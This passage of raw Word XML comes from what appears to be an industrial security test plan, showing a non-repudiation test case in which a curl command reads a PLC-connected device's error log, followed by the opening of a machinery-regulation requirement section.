      <w:tr w:rsidR="003A144C" w:rsidRPr="00D67CA6" w14:paraId="5B7DB7E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87E534" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60709E81" w14:textId="5518D29D" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00E6134D"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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w14:paraId="4A45026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1059249" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DC99AD0" w14:textId="76A0B278" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00E6134D"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SVV-3 (Vulnerability/ documentation &amp; log review)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00FD6890" w14:paraId="359ADFB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7A948B" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA171E2" w14:textId="468BFF11" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00F7696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7696E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that because configuration is authored at the engineering tool and pushed from the (password-protected) PLC via fieldbus, the device holds no actor identity for a config modification</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F7696E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> attribution, if it exists, resides in the PLC/engineering project, not on the SRIO. This bounds CR 2.12 as delegated, not implemented.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="041E34B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184550E" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A07D9E6" w14:textId="77777777" w:rsidR="00851244" w:rsidRDefault="0085124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1244">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Perform an authorised config change from a known engineering-tool user. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="545A5ABB" w14:textId="77777777" w:rsidR="00851244" w:rsidRDefault="0085124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1244">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Inspect every device-side evidence field (Error Log, I&amp;M records) for any actor/identity attribute. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="233D5F8A" w14:textId="77777777" w:rsidR="00851244" w:rsidRDefault="0085124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1244">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Inspect the PLC/engineering side for where the actor identity actually resides. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CBFC611" w14:textId="2957AABA" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="0085124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1244">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Conclude where (if anywhere) non-repudiation is anchored.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="29190AE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D86530" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29AE91B8" w14:textId="20264594" w:rsidR="003A144C" w:rsidRPr="00164CDB" w:rsidRDefault="00164CDB"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sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00164CDB">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Gap-characterisation test. Expected: no device-side field carries an actor identity → CR 2.12 not met at the device; attribution only at the PLC/TIA layer → confirms G-1 as delegation. Documented as: device-level non-repudiation for config modification is architecturally impossible for this QM </w:t>
            </w:r>
            <w:r w:rsidRPr="00164CDB">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>slave.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40C4D9B9" w14:textId="77777777" w:rsidR="003A144C" w:rsidRPr="00AF57B2" w:rsidRDefault="003A144C" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE16DD0" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="003A144C">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3A144C" w14:paraId="05B5C37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53EBC13" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22C1F3E1" w14:textId="77777777" w:rsidR="003A144C"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3A144C" w14:paraId="53D9BD4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17DBE9" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="135C37EA" w14:textId="49A8E142" w:rsidR="003A144C" w:rsidRPr="00D83C4F" w:rsidRDefault="00D83C4F" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D83C4F">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ009-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="5A95C32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406D78" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39B47268" w14:textId="48FA7017" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00F61476"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61476">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SPS 192.168.0.1 (with user-access control), DUT 192.168.0.2; Pi mgmt path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="21BDB6E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6C213B" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5543B684" w14:textId="7095B3BF" w:rsidR="003A144C" w:rsidRPr="00B91182" w:rsidRDefault="00B91182" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B91182">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIA Portal (user login + change log); curl/PN reads (device side); NIST SP 800-115 §3.1/§3.2 documentation &amp; log review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="4C904A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61D8FD0" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20D99D52" w14:textId="77777777" w:rsidR="00081379" w:rsidRPr="00081379" w:rsidRDefault="00081379" w:rsidP="0008137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81379">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ009-03 Where does the actor identity live?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5775189F" w14:textId="77777777" w:rsidR="00081379" w:rsidRPr="00081379" w:rsidRDefault="00081379" w:rsidP="0008137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81379">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Device side: confirm NO actor attribute in any evidence field</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="423E70B1" w14:textId="77777777" w:rsidR="00081379" w:rsidRPr="00081379" w:rsidRDefault="00081379" w:rsidP="0008137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81379">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist | grep -i -E 'user|actor|id' &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70760379" w14:textId="77777777" w:rsidR="00081379" w:rsidRPr="00081379" w:rsidRDefault="00081379" w:rsidP="0008137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81379">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>|| echo "no actor field on device"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3722C946" w14:textId="7A703C9A" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00081379" w:rsidP="0008137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81379">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># PLC side: export TIA audit trail / project change log -&gt; record the engineering-tool user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="550160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6847384" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32507E13" w14:textId="4240FA07" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00A360E9"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360E9">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>No actor attribute device-side; actor (if any) only in the PLC/TIA layer (config "saved on the PLC, typically password-protected")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00AD4B09" w14:paraId="6F727638"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0E72C36" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F97D927" w14:textId="1C1FD0BC" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00A360E9"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No device-side actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="78C900F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52E465F" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B4E6016" w14:textId="7E308392" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="003F2591"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3F2591">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Device grep output, TIA audit-trail export, architecture note citing fieldbus-sourced config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62F60BC6" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFB048C" w14:textId="77777777" w:rsidR="000835AC" w:rsidRDefault="000835AC" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB9AAB4" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527EB444" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A671BA6" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737C3D33" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6767D534" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4803BD41" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0738F7FB" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791150AA" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34117C64" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647C7A51" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D80731A" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B47EDD0" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59645CF2" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D95958" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2D730B" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDE9D0E" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18429B89" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420A2B8B" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65AE3BE1" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64531861" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCF7BBB" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E901BC4" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43187888" w14:textId="77777777" w:rsidR="00C51580" w:rsidRDefault="00C51580" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F334E8" w14:textId="61CA64BE" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4173A9"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092B695C" w14:textId="2D4C3EA1" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617593F6" w14:textId="19B1CCE2" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text: The control system shall withstand reasonably foreseeable malicious attempts from third parties that could lead to a hazardous situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA1E47" w14:textId="092BB3B2" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
